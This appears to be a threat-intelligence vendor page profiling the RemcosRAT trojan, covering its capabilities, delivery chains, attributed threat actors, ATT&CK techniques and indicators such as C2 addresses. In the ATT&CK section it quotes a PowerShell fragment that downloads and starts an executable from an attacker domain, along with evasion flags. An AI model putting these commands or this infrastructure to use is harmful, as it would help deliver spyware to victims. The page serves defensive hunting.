MalwareRansomwareUsed by 7 actors

RemcosRAT

RemcosRAT is a full-featured remote access trojan used across a wide range of criminal and espionage-linked campaigns. The content directly describes capabilities including remote command execution, file management, process control, keylogging, screenshot capture, webcam and microphone surveillance, clipboard monitoring, and theft of data from browsers and applications. Reported configurations include storage of keylogs in logs.dat, screenshot capture at 10-second intervals, audio recording in 5-second clips, and use of registry-based persistence such as HKCU\Software\Remcos or startup keys. Multiple reports describe RemcosRAT being process-hollowed or injected into legitimate Microsoft binaries including Aspnet_compiler.exe and Msbuild.exe, and one campaign used vulnerable drivers for kernel-level privilege escalation before deploying the final payload.

Observed delivery vectors in the content include HTA droppers executed via mshta.exe, obfuscated JavaScript attachments, PowerShell stages, AutoIt scripts, DLL sideloading with signed VMware and Microsoft Edge binaries, LNK-based chains, malicious SVG-linked archives, trojanized VeraCrypt installers, illegal gambling-related tools, and phishing lures themed as purchase inquiries, court summonses, enforcement notices, combat videos, and romance or acquaintance outreach. Public hosting and staging services mentioned in related campaigns include GitHub, Google Drive, OneDrive, Bitbucket, Dropbox, Discord CDN, YDRAY, Paste.ee, archive.org, pastefy.app, and pastes.io.

The malware is associated in the content with numerous threat actors and distribution ecosystems. CERT-UA reported UAC-0184 using RemcosRAT against representatives of Ukraine’s Defense Forces to steal documents and messenger data. UAC-0050 / DaVinci Group has previously used RemcosRAT in attacks targeting Ukraine. Konni-related activity targeting South Korean users and North Korean defectors included RemcosRAT alongside other RATs. Red Akodon used RemcosRAT in phishing campaigns impersonating Colombian judicial and government entities. Acronis TRU’s Shadow Vector campaign in Colombia delivered RemcosRAT via DLL side-loading and vulnerable drivers. Breakglass Intelligence documented RemcosRAT delivered by GoLoader and by the Amadey pay-per-install campaign tagged fbf543. Additional reporting linked RemcosRAT activity to attacks on Russian organizations, attacks targeting Ukraine, and campaigns against South Korean users.

Targeting described in the content spans defense and military personnel in Ukraine, government, healthcare, technology, and manufacturing sectors worldwide, Colombian users and organizations, South Korean users, cryptocurrency users in broader malware ecosystems, and Russian organizations. Infrastructure and indicators explicitly mentioned for RemcosRAT campaigns include the-new-age.co.ua:443, biches-yeah.co.ua:443, 178.33.57.149:443, 178.33.57.159:8899, 88.151.192.14:443, 216.250.249.222 on ports 80 and 443, goodpeopleswhitbrigheartwinthisindustryi.duckdns.org:14646, mutexes Rmc-E3G25N and Rmc-3UG3BG, install name remcos.exe, and license hash 72214B9FB81C38C5D9F33A771B74F635. Related staging infrastructure in one 2026 campaign included 96.44.159.218 and multiple Remcos listeners on 96.44.159.137, 96.44.159.225, 96.44.159.222, 96.44.159.151, 96.44.159.165, and 96.44.159.154, with default Remcos TLS certificates noted. Specific sample references in the content include remcos.exe communicating with the-new-age.co.ua:443 and multiple 2026 samples clustered by shared imphash and configuration artifacts.

For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial

THREAT ACTORS

Groups observed using it

7 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

View more details

UAC-0184

remcos.exe (RemcosRAT; idelural; the-new-age.co.ua:443)

via cert uacert.gov.ua

Kimsuky

“These installers executed AutoIt scripts… that deployed multiple RATs (RemcosRAT, QuasarRAT, and RftRAT)…”

via securityaffairssecurityaffairs.com

APT37

The files distributed were malicious AutoIt scripts and modules that enable remote access and keylogging, as well as various RATs, including LilithRAT and RemcosRAT.

via dark readingdarkreading.com

Red Akodon

Red Akodon targets users... using remote access trojans (RAT) like RemcosRAT, QasarRat, AsyncRAT, and XWorm.

via scilabs blogblog.scilabs.mx

UAC-0050

"...and remote access trojans such as RemcosRAT in attacks targeting Ukraine."

via the hacker newsthehackernews.com

PseudoSticky

"...to attack Russian organizations... with malware like RemcosRAT and DarkTrack RAT..."

via the hacker newsthehackernews.com

+1 more in the app

MITRE ATT&CK

Techniques & procedures

35 distinct techniques documented for this family, organized by ATT&CK tactic.

Resource Development

1 technique

T1583.003Virtual Private ServerEvidence1

MITRE ATT&CK T1583.003 — Virtual Private Server (PFCLOUD, ThinkHuge, OMEGATECH)

Initial Access

2 techniques

T1566.001Spearphishing AttachmentEvidence4

MITRE ATT&CK Mapping Tactic Technique ID Implementation Initial Access Phishing: Spearphishing Attachment T1566.001 Email with "Bank slip.exe", "Payment Advice.exe"

T1566.003Spearphishing via ServiceEvidence1

основним каналом доставки шкідливих програм є популярні месенджери, а методи первинного проникнення передбачають використання елементів соціальної інженерії

Execution

7 techniques

T1047Windows Management InstrumentationEvidence1

Execution Windows Management Instrumentation T1047 Win32_Process.Create() hidden window launch

T1059.001PowerShellEvidence2

The PowerShell runs with the standard evasion flags: -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden.

T1059.005Visual BasicEvidence1

Execution VBScript T1059.005 HTA VBScript execution in mshta.exe

T1059.007JavaScriptEvidence2

Execution JavaScript T1059.007 WScript execution of obfuscated JS dropper

T1059.010AutoHotKey & AutoITEvidence1

MITRE ATT&CK Mapping Tactic Technique ID Implementation Execution Command and Scripting: AutoIt T1059.010 AutoIt-compiled loader with WRSJLIM cipher

T1129Shared ModulesEvidence1

Execution Shared Modules T1129 .NET Assembly.Load() for DEV.dll reflective loading

T1204.002Malicious FileEvidence3

під час якого останньому передається файл (архів) з проханням допомогти у його відкритті/обробці

Persistence

1 technique

T1547.001Registry Run Keys / Startup FolderEvidence3

%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Patchhelp_beta.lnk ... Streamsvc.lnk ... appBg.lnk

Privilege Escalation

4 techniques

T1055Process InjectionEvidence1

MITRE ATT&CK Mapping Tactic Technique ID Implementation Defense Evasion Process Injection T1055 VirtualAlloc RWX + DllCallAddress shellcode execution

T1055.012Process HollowingEvidence2

Defense Evasion Process Hollowing T1055.012 Aspnet_compiler.exe hollowed via NT API

T1547.001Registry Run Keys / Startup FolderEvidence3

%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Patchhelp_beta.lnk ... Streamsvc.lnk ... appBg.lnk

T1548.002Bypass User Account ControlEvidence1

Privilege Escalation Bypass UAC T1548.002 Registry: EnableLUA = 0 modification

Stealth

8 techniques

T1027Obfuscated Files or InformationEvidence4

Defense Evasion Obfuscated Files or Information T1027 Whitespace padding, random case, base64, delimiter-based concatenation

T1036MasqueradingEvidence1

Defense Evasion Masquerading T1036 Abuse of Msbuild.exe as LOLBin host

T1036.001Invalid Code SignatureEvidence1

MITRE ATT&CK Mapping Tactic Technique ID Implementation Defense Evasion Masquerading: Invalid Code Signature T1036.001 Stolen/abused code signing certs

T1055Process InjectionEvidence1

MITRE ATT&CK Mapping Tactic Technique ID Implementation Defense Evasion Process Injection T1055 VirtualAlloc RWX + DllCallAddress shellcode execution

T1055.012Process HollowingEvidence2

Defense Evasion Process Hollowing T1055.012 Aspnet_compiler.exe hollowed via NT API

T1140Deobfuscate/Decode Files or InformationEvidence1

Defense Evasion Deobfuscate/Decode Files T1140 Base64, UTF-16LE, delimiter stripping

T1497Virtualization/Sandbox EvasionEvidence1

Defense Evasion Virtualization/Sandbox Evasion T1497 3-second sleep timer

T1620Reflective Code LoadingEvidence1

MITRE ATT&CK Mapping Technique ID Usage Reflective Code Loading T1620 Go-based reflective PE loader (both v1 and v2)

Credential Access

2 techniques

T1056.001KeyloggingEvidence1

Credential Access Keylogging T1056.001 Continuous keylogging to logs.dat

T1555Credentials from Password StoresEvidence1

Credential Access Credentials from Password Stores T1555 Outlook credential theft via Nirsoft tools

Discovery

1 technique

T1497Virtualization/Sandbox EvasionEvidence1

Defense Evasion Virtualization/Sandbox Evasion T1497 3-second sleep timer

Collection

5 techniques

T1056.001KeyloggingEvidence1

Credential Access Keylogging T1056.001 Continuous keylogging to logs.dat

T1113Screen CaptureEvidence2

Collection Screen Capture T1113 Periodic screenshots to Screenshots/ directory

T1114Email CollectionEvidence1

Collection Email Collection T1114 Outlook account access

T1123Audio CaptureEvidence2

Collection Audio Capture T1123 5-second audio recording clips

T1125Video CaptureEvidence1

Collection Video Capture T1125 Camera access via OpenCamera/CloseCamera

Command and Control

8 techniques

T1071Application Layer ProtocolEvidence1

Command and Control Application Layer Protocol T1071 TLS-encrypted C2 on port 14646

T1095Non-Application Layer ProtocolEvidence1

The RAT -- compiled February 3, 2026 -- phones home to a dedicated C2 at 216.250.249.222 on ports 80 and 443 using Remcos proprietary protocol (not HTTP, not TLS -- raw TCP masquerading on web ports).

T1102Web ServiceEvidence1

Command and Control Web Service T1102 Paste services (pastefy.app, pastes.io) for payload hosting

T1105Ingress Tool TransferEvidence1

-uri http://yeah-biches.kyiv.ua/securitycheck.exe -OutFile securitycheck.exe; start securitycheck.exe

T1219Remote Access ToolsEvidence1

REMCOSRAT ... XWORM

T1568.002Domain Generation AlgorithmsEvidence1

Command and Control Dynamic Resolution T1568.002 DuckDNS for C2 domain resolution

T1571Non-Standard PortEvidence1

Command and Control Non-Standard Port T1571 Remcos protocol on ports 80/443 (not HTTP/TLS)

T1573Encrypted ChannelEvidence1

Command and Control Encrypted Channel T1573 Optional TLS mode available in configuration

Exfiltration

1 technique

T1041Exfiltration Over C2 ChannelEvidence1

SIGTOP та TUSC використовуються для викрадення та вивантаження даних з ЕОМ

INDICATORS OF COMPROMISE

IOCs tracked for this family

84 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app

Network

28 tracked

IPs, domains, and DNS infrastructure linked to this family.

Hashes

44 tracked

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Other

12 tracked

Other indicator types observed in public reporting.

TypeValueLatest sighting

domain●●●●●●●●●●●●View more in app3 months ago

hash.sha256●●●●●●●●●●●●View more in app4 months ago

uri●●●●●●●●●●●●View more in app4 months ago

ip.v4●●●●●●●●●●●●View more in app4 months ago

domain●●●●●●●●●●●●View more in app4 months ago

ACTIVITY FEED

Recent activity

23 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

23 SOURCESView more in app

help net securityNews

Jun 26, 2026

A privacy-first take on local malware analysis - Help Net Security

A remote access trojan family included in the classifier’s malware classes.

censys blogNews

Apr 2, 2026

Cutting Through the Noise: A Technique-Based Approach to Hunting Web-Delivered Malware - Censys

A remote access trojan mentioned as one of the payloads delivered by PhantomVAI in other campaigns.

breakglass intelNews

Mar 12, 2026

RemcosRAT Four-Stage JavaScript Dropper: Rotational XOR, Process Hollowing, and a Staging Server the Operator Forgot to Lock - Breakglass Intelligence - Breakglass Intelligence

A commercial remote access trojan abused in cybercrime campaigns. In this campaign it is delivered through a four-stage chain, process-hollowed into Aspnet_compiler.exe, and used for surveillance and remote control including keylogging, camera access, audio recording, screenshots, file management, command execution, and watchdog behavior.

breakglass intelNews

Mar 12, 2026

DarkCloud Stealer via AutoIt Crypter-as-a-Service: Three Encryption Layers, Triple-Channel Exfiltration, and a XAMPP Panel That Ties 25 Samples Together - Breakglass Intelligence - Breakglass Intelligence

A remote access trojan observed among the malware families delivered by the same AutoIt crypter operation.

+19 more in the timeline

What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.

Start free trial

IOC matching84

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution7

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping35

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.